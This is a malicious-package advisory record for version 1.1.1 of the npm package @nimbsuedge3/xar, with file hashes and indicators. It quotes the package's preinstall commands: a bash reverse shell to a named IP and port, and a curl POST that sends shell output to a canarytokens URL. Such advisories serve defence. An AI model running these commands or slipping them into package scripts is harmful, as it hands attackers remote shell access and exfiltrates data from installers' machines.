{"id":"MAL-2026-16301","summary":"Malicious code in @nimbsuedge3/xar (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (85a83fa3df94cc0a526feb9df2e8a877f89713501a083059a4b8ae5a9bf2fcaf)\npackage.json declares a preinstall lifecycle script that runs `bash -i \u003e& /dev/tcp/147.93.157.202.nip.io/8080` to open an interactive reverse shell to a bare-IP host wrapped via nip.io, and pipes shell output through `curl -X POST --data-binary @- http://canarytokens.com/terms/7dc94zmd3so67n5vbz5bxmt7v/contact.php` as an out-of-band exfiltration beacon. Both actions fire automatically on `npm install`, giving the operator of 147.93.157.202:8080 interactive shell access on the installer's host and shipping command output to the hardcoded canarytokens.com URL. The package ships no legitimate functionality consistent with this behavior.\n","modified":"2026-09-21T03:30:16.591866022Z","published":"2026-09-21T02:58:50Z","database_specific":{"malicious-packages-origins":[{"source":"amazon-inspector","versions":["1.1.1"],"id":"IN-MAL-2026-020195","import_time":"2026-09-21T03:24:20.262540439Z","modified_time":"2026-09-21T02:58:50Z","sha256":"85a83fa3df94cc0a526feb9df2e8a877f89713501a083059a4b8ae5a9bf2fcaf"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/@nimbsuedge3/xar/v/1.1.1"}],"affected":[{"package":{"name":"@nimbsuedge3/xar","ecosystem":"npm","purl":"pkg:npm/%40nimbsuedge3/xar"},"versions":["1.1.1"],"database_specific":{"cwes":[{"name":"Embedded Malicious Code","cweId":"CWE-506","description":"The product contains code that appears to be malicious in nature."}],"indicators":{"evidence_files":[{"path":"package.json","sha256":"02d67b4a9e7bd5c86f7fd06abb47fe2ad16d0981757715c941c31039acf6ddf8","tlsh":"84e0c0301510a83738c94b95352387a53674775f4ca15c19dac302451f19ad93817a48"}],"package_integrity":[{"filename":"xar-1.1.1.tgz","hashes":{"sha1":"d49ec8fdc58f95a8c1200bc381211b2d984c7dbb","sha512_sri":"sha512-g4aVKFMeDr2zSgIDMCAd47RgCAaZnrbSAb2ZPUhsL951qMW1LHoE1ylP8aANUyrv6vQSNko1kScMwjNMcpXiIQ=="}}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@nimbsuedge3/xar/MAL-2026-16301.json"}}],"schema_version":"1.9.0","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}